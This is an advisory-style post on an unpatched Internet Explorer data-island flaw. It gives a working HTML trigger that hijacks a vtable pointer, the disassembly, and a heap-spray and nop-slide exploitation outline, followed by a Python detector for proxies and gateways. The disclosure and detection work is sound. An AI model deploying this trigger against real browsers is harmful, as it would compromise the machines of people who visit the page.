A critical vulnerability in several versions of Internet Explorer is being actively exploited. The vulnerability has not been patched yet by Microsoft, which means that your computer can get compromised by simply visiting a web page (using Internet Explorer) that exploits the vulnerability. Here is some code that can be used to trigger the vulnerability:
<xml id="foo">
  <data><entry><![CDATA[<image src="http://&#x0c0c;&#x0c0c;AAAAAAAAAAA">]]></entry></data>
</xml>
<span datasrc="#foo" datafld="entry" dataformatas="html">
  <span datasrc="#foo" datafld="entry" dataformatas="html">
  </span>
</span>
When the code above is rendered by Internet Explorer, the first four bytes after the protocol in the URL of the image element (the two character references &#x0c0c;&#x0c0c;, i.e. 0c0c0c0c) end up controlling an object pointer in the RunHTMLApplication function in mshtml.dll. These four bytes get loaded into the eax register, as shown below (the disassembly is from Internet Explorer 8 Beta 2):
mshtml!RunHTMLApplication+0x52db: 6a795bbd 8b08 mov ecx,dword ptr [eax] ds:0023:0c0c0c0c=????????
Here is the code that follows:
68565bbf 57              push    edi
68565bc0 50              push    eax
68565bc1 ff91c4000000    call    dword ptr [ecx+0C4h]
As you can see, the pointer copied into the ecx register is expected to point to a vtable (virtual method table). The last line of the code above transfers control to one of the methods in that vtable, namely the one whose address is stored at ecx + 0xc4. The vulnerability can therefore be exploited by placing a fake vtable at 0x0c0c0c0c (e.g., using heap spraying), where every method slot in the fake vtable holds the value 0x0c0c0c0c.
The shellcode can be stored after the data that serves as the fake vtable. When control is transferred to the address stored at ecx + 0xc4, which is itself 0x0c0c0c0c, the bytes starting at that address serve as a nop slide that leads into the shellcode.
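Because no patch is available, a proxy, mail gateway or web filter can at least flag pages that carry the trigger shape shown above. The following detector is an added example written for this post; it is not code from the original advisory. It scans HTML for the two features that make up the trigger: a field of an <xml> data island bound as HTML more than once (the nested datasrc/datafld spans), and an image URL whose host starts with a repeated 16-bit character reference, which is what a pointer-like value such as 0c0c0c0c looks like in markup. The two HTML samples are constructed for the demonstration; the function names are my own.

```python
import re
from collections import Counter
from typing import Dict, List, Tuple

# Constructed sample: the trigger shape from the post (data island bound twice as
# HTML, image URL whose host is a repeated character reference). Not a full exploit.
SAMPLE_TRIGGER = '''<html><body>
<xml id="foo">
  <data><entry><![CDATA[<image src="http://&#x0c0c;&#x0c0c;AAAAAAAAAAA">]]></entry></data>
</xml>
<span datasrc="#foo" datafld="entry" dataformatas="html">
  <span datasrc="#foo" datafld="entry" dataformatas="html"></span>
</span>
</body></html>'''

# Constructed benign sample: one data island, bound once, with ordinary content.
SAMPLE_BENIGN = '''<html><body>
<xml id="prices"><data><entry><![CDATA[<b>12.50</b>]]></entry></data></xml>
<span datasrc="#prices" datafld="entry" dataformatas="html"></span>
</body></html>'''

XML_ISLAND_RE = re.compile(r'<xml\s+[^>]*\bid\s*=\s*["\']?([^"\'\s>]+)', re.I)
TAG_RE = re.compile(r'<(span|div)\b([^>]*)>', re.I)
ATTR_RE = re.compile(r'([a-z][\w-]*)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s"\'>]+))', re.I)
# A URL whose authority begins with the same 4-hex-digit character reference twice,
# e.g. http://&#x0c0c;&#x0c0c; -- four identical bytes where a hostname should be.
SPRAY_HOST_RE = re.compile(r'src\s*=\s*["\']?[a-z]+://(&#x([0-9a-f]{4});)\1', re.I)


def parse_attrs(attr_text: str) -> Dict[str, str]:
    """Turn the attribute part of a start tag into a lowercase-keyed dict."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ''
    return attrs


def html_bindings(html: str) -> List[Tuple[str, str, str]]:
    """Return (island id, field, dataformatas) for each span/div data binding."""
    found = []
    for m in TAG_RE.finditer(html):
        a = parse_attrs(m.group(2))
        if 'datasrc' in a and 'datafld' in a:
            found.append((a['datasrc'].lstrip('#'), a['datafld'],
                          a.get('dataformatas', '').lower()))
    return found


def scan_html(html: str) -> List[str]:
    """Return a list of reasons the document looks like the trigger; empty if clean."""
    reasons = []
    islands = {m.group(1) for m in XML_ISLAND_RE.finditer(html)}
    # The trigger binds the same island field as HTML twice (nested spans).
    counts = Counter(b for b in html_bindings(html)
                     if b[0] in islands and b[2] == 'html')
    for (src, fld, _), n in counts.items():
        if n > 1:
            reasons.append(f'field "{fld}" of data island "{src}" is bound as HTML {n} times')
    if SPRAY_HOST_RE.search(html):
        reasons.append('image URL host is a repeated 16-bit character reference (pointer-like)')
    return reasons


if __name__ == '__main__':
    for name, doc in (('trigger', SAMPLE_TRIGGER), ('benign', SAMPLE_BINARY if False else SAMPLE_BENIGN)):
        hits = scan_html(doc)
        print(f'{name}: {"FLAGGED" if hits else "clean"}')
        for r in hits:
            print('  -', r)
```

Either reason on its own is worth a look, but a document that raises both is a strong match for this particular trigger; a legitimate data-bound page binds a field once, and no real hostname is spelled out as a repeated character reference.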